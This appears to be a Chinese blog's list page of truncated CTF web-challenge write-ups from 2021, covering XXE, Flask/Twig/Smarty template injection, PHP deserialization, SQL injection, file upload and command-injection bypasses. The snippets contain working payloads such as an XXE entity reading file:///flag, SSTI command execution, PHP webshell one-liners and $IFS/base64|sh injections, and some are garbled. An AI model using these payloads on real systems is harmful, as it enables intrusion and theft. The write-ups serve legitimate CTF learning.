- 博客(43)
- 收藏
- 关注
RSS订阅原创 [NCTF2019]True XML cookbook 1(XML)
总结一下知识点:抓包,插入恶意XML外部实体/etc/hosts 储存域名解析的缓存/etc/passwd 用户密码/proc/net/arp 每个网络接口的arp表中dev包直接用下面的代码读取flag会报错<?xml version="1.0" ?><!DOCTYPE note [<!ENTITY M1kael SYSTEM "file:///flag">]><user><username>&M1kael;<
2021-10-20 13:13:39
319
原创 [GYCTF2020]FlaskApp 1(SSTI,PIN)
f12发现了提示,但是我对PIN没有了解所以没反应过来扫了一下网站,发现了一个网站打开非预期解:本题存在SSTI注入加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTIpython-Flask模版注入攻击SSTI(python沙盒逃逸)查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
2021-10-20 12:57:44
1178
原创 [BJDCTF2020]EasySearch 1(shtml)
扫描到后台后index.php.swp文件泄露,访问一下得到源码(反正我是没有扫到,wuwuwu~)可以看到password的md5值的前六位要等于6d0bc1不会写哈,用用别人的import hashlibfor i in range(1000000000): a = hashlib.md5(str(i).encode('utf-8')).hexdigest() if a[0:6] == '6d0bc1': print(i) print(a)
2021-10-16 23:06:56
202
原创 [CISCN2019 华东南赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
知识点:SSTIsmartyX-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For发现Current IP更改为相应值回想到曾经做过的题,用SSTI发现存在注入获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
2021-10-16 22:20:33
407
原创 [NPUCTF2020]ReadlezPHP 1[b(a)]
f12发现了令一个网页,打开发现代码,开始审计__destruct()魔术方法:属性b包裹住属性a利用assert()函数assert 判断一个表达式是否成立assert()可以将整个字符串参数当作php参数执行。构造反序列化由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo())反序列化构造payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
2021-10-16 16:09:38
121
原创 [MRCTF2020]Ezpop 1(代码审计)
太绕了,wuwuwu~Welcome to index.php<?php//flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95/
2021-10-13 22:11:11
296
原创 [极客大挑战 2019]FinalSQL 1
开始试了试登录框,用sql注入,发现总是出现后来发现url可能存在注入通过bp,发现过滤了很多输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’由于空格被过滤,用()代替。import requestsurl = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php'flag = ''for i in range(1,250):# range.
2021-10-12 18:30:57
407
原创 [SUCTF 2019]Pythonginx 1(nginx)
1.2019black hat一个议题PPT:https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf这也就是说我们传入的url为http://evil.c℀.com在经过上述处理过后便成为了http://evil.ca/c.com在unicode中字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此ur
2021-09-25 13:57:12
189
原创 [SWPU2019]Web1
1.二次注入2.bypass information_schema3.无列名注入bypass information_schema尝试使用单引号判断是否存在注入报错说明存在二次注入题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号本题在但是比赛中bypass information_schema是利用的sys.schema_auto_incr
2021-09-12 17:35:28
477
原创 [De1CTF 2019]SSRF Me 1(代码审计)
#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urando
2021-09-11 15:23:27
218
原创 [WesternCTF2018]shrine 1(flask)
非常完美的答案分析源码app.config['FLAG'] = os.environ.pop('FLAG')注册了一个名为FLAG的config,猜测这就是flag,如果没有过滤可以直接{{config}}即可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s上面这行代码把黑名单的东西遍历并设为空,例如:
2021-09-10 19:38:35
246
原创 [CISCN 2019 初赛]Love Math 1
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r'
2021-09-09 19:40:46
96
原创 [WUSTCTF2020]朴实无华 1(代码审计intval、MD5、ca\t${IFS})
刚打开时乱码:解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码发现有bot的字样,打开robots.txt发现fAke_f1agggg.php,打开啥都没有,抓一下当前网页的包发现 /fl4g.php,打开,发现代码<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//leve
2021-09-08 23:43:40
217
1
原创 [BJDCTF2020]Cookie is so stable 1(twig模板注入)
详解模板注入漏洞关于SSTI注入的一些理解抓个包:发现了两个包在cookie上的不同判断是twig,经过测试发现是ssti注入Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}注释:如果不抓包在页面是无法获得flag的,应该有过滤...
2021-09-06 23:59:12
310
原创 [BSidesCF 2020]Had a bad day 1(伪协议嵌套)
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的php://filter/read=convert.base64-encode/resource=index然后用base64解密<?php$file = $_GET['category'];if(isset($file)){if( strpos( $file, "woofers".
2021-09-06 20:10:22
220
原创 网鼎杯 2020 朱雀组]phpweb 1(回调函数)
抓个包func是一个函数名,而p是一个参数,所以可以猜测用func来执行pfunc=highlight_file&p=index.php得到index.php的源码<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapes.
2021-09-06 11:25:16
115
原创 [BJDCTF2020]Mark loves cat 1
用dirb扫一下,发现源码泄露dirb http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/脚本获得源码python GitHack.py http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/<?phpinclude 'flag.php';$yds = "dog";$is = "cat";$handsome = 'yds';foreach(
2021-09-06 10:39:29
489
2
原创 [BJDCTF2020]ZJCTF,不过如此(preg_replace /e)
知识点:1.php伪协议小结(文件包含)2.深入研究preg_replace与代码执行3.php可变变量看到//next.php;想个办法看下next.phppayload:http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&file=php://filter/convert.base64-encode/resource=next.phpI have a dreambase6
2021-08-05 18:05:33
186
原创 [RoarCTF 2019]Easy Java(web.xml)
wp链接WEB-INF主要包含一下文件或目录:/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件/WEB-INF/src/:源码目录,按照包名结
2021-07-30 21:33:33
210
原创 BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd)
答案博客参考博客百度来了一篇文章:https://paper.seebug.org/164/这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。escapeshellarg:escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。escapeshellcmd:e
2021-07-24 15:24:55
142
原创 [GXYCTF2019]BabyUpload 1 文件上传
源码:<?phpsession_start();echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title><form action=\"\" method=\"post\" enctype=\"multipart/form-data\">上传文件<input type=\"file\" name=\"
2021-07-22 15:13:41
1876
2
原创 [极客大挑战 2019]HardSQL(updatexml报错注入)
wp参考博客username=admin’or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21最后一步是只能查到一半的flag所以要再用left()right()语句查询拼接username=admin’or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=2
2021-07-21 09:37:32
58
原创 [GYCTF2020]Blacklist 1堆叠注入
答案链接过滤了这么多,比强网杯过滤更加严格了这里我们用到handler这个东西HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#堆叠注入小tips...
2021-07-20 16:18:42
118
原创 [MRCTF2020]Ez_bypass 1 审计
I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo
2021-07-20 12:08:55
219
原创 [网鼎杯 2020 青龙组]AreUSerialz 1
知识点总结:强类型比较和弱类型比较+反序列化<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile";
2021-06-29 21:51:21
74
2
原创 [ZJCTF 2019]NiZhuanSiWei 1
伪协议+反序列化if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){需要让$text输入 ”welcome to the zjctf“ 传入文件中才能进行后面的步骤,这里可以用php://input伪协议在以POST形式传入“ welcome to the zjctf " 也可以用data伪协议传参补充知识点:PHP伪协议总结php://input + [POST DATA]执行
2021-06-25 16:36:20
108
原创 [BJDCTF2020]Easy MD5 1
bp抓包看到:select * from ‘admin’ where password=md5($pass,true)查看一下md5()函数的true参数和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到ffifdyop字符串会造成漏洞·在本地环境试验ffifdyop,输出的开头是’or’6xxxxxx在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1.
2021-06-24 15:51:23
1068
原创 [ACTF2020 新生赛]BackupFile 1弱比较
博客写得挺好https://blog.csdn.net/weixin_45674567/article/details/106412484<?php include_once "flag.php";//包含flag文件 if(isset($_GET['key'])) {//获取key参数 $key = $_GET['key']; if(!is_numeric($key)) {//判断key是否为数值OR数字字符串,不仅可以检查10进制,16进制也可以 ex
2021-06-21 22:00:58
143
3
原创 [ACTF2020 新生赛]Upload 1
在传输的过程中发现只能传输图片,但是蚁剑不能连接图片,所以我将一句话木马写在phtml里准备用bp拦截,但是发现根本拦截不了,因为前端有拦截,发现不是图片便删除了:所以我将onsubmit删除,再进行传输,传输成功,再用蚁剑连接,连接成功,然后在根目录下找到了flag...
2021-06-21 15:04:08
113
原创 [极客大挑战 2019]Upload 1
上传什么都提示:提示要上传图片上传一句话木马:<?php eval($_POST['b'])?><?php $_GET['a']($_POST['b'])?>抓包,将Content-Type里面的格式改为image/jpeg提示:换个一句话木马:GIF89a? <script language="php">eval($_REQUEST[1])</script>上传成功现在需要知道图片的保存路径了。一般都是upload/fil.
2021-06-17 19:54:56
61
1
原创 [极客大挑战 2019]PHP 1
用dirsearch-master扫描网站:发现了www.zip,在网址后面加/www.zip,下载www.zip然后解压发现:挨个文件打开,发现flag.php里的flag是假的,然后发现class.php文件中:<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; pub.
2021-06-16 16:48:13
369
2
原创 [GXYCTF2019]Ping Ping Ping
三种解:1./?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php2.echo$IFS1Y2F0IGZsYWcucGhw∣base641Y2F0IGZsYWcucGhw|base641Y2F0IGZsYWcucGhw∣base64IFS1−d∣sh3.http://530bbcaf−9d64−494e−8993−bb3727c31a5a.node3.buuoj.cn/?ip=127.0.0.1;cat1-d|sh3.http://530bbcaf-9d64-494
2021-04-24 00:08:09
72
原创 [SUCTF 2019]EasySQL
GitHub上有源码(https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql)index.php源码<?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLi
2021-04-23 15:49:27
130
原创 [ACTF2020 新生赛]Include
这个url,似乎告诉我这里是突破口 抓包查看响应头得到 ==> php7.3.13url ?file=flag.php考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路重新考虑之后使用 “php://filter"伪协议” 来进行包含使用php://filter伪协议进行文件包含时,需要加上read=convert.base64-encode来对文件内容进行编码发送请求得到base64编码后的flag.php文件源码:base64解码:参考博客.
2021-04-22 17:07:41
43
原创 [RoarCTF 2019]Easy Calc
参考博客:https://blog.csdn.net/weixin_44077544/article/details/102630714(这道题有关的知识点,挺全的)按F12看到了calc.php?num=然后%20绕过waf,var_dump显示,scandir()列出 参数目录 中的文件和目录,要不然我们怎么知道flag在哪。发现“/”被过滤了,才用ASCII绕过发现f1agg,采用以下两种都可以拿到flagokk补充:试了一下下面的发现不行:还发现calc.php?ca
2021-04-21 21:07:38
54
原创 [BJDCTF 2nd]假猪套天下第一
抓个登录时的包发现L0g1n.php抓个L0g1n.php的包提示我们99年才能进去,所以把时间调到尽可能大:发现提示发生变化,说只有本机才能进去,我们先用修改X-Forwarded-For尝试一下发现XFF被过滤,尝试用Client-ip或者X-Real-ip来进行登录:成功,发现提示发生变化,需要我们是来自gem-love.com的,那么我们修改头来进行匹配提示发生变化,要求我们浏览器必须是Commodore 64,修改user-agent(注意一定是Commodore 64,提示没
2021-04-19 20:50:27
102
原创 [极客大挑战2019]Http
1.F12看原代码,发现Secret.php2.打开此php,并抓包根据repeater-》go后的提示更改:所用知识点:参考博客:https://blog.csdn.net/SopRomeo/article/details/104087996
2021-04-19 19:56:20
54
原创 [极客大挑战]Secret File
首先打开这道题无从下手,然后F12,看下代码发现:Archive_room.php然后看到这样的页面:然后点击SECRET:那就用BP抓包:repeater->go发现一个php文件,打开发现flag.php然后看之前的代码:提示用文件包含漏洞:http://2c6dfd8c-3385-4b5d8ccd21d4cc22abfe.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resour
2021-04-17 15:11:35
43
原创 [HCTF 2018]WarmUp writeup
F12查看2.查看source.phpcehckFile这个函数进行了 3次白名单检测、 2次问好过滤、一次URL解码class emmm { public static function checkFile(&$page) { //白名单列表 $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; .
2021-04-17 11:03:03
131
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人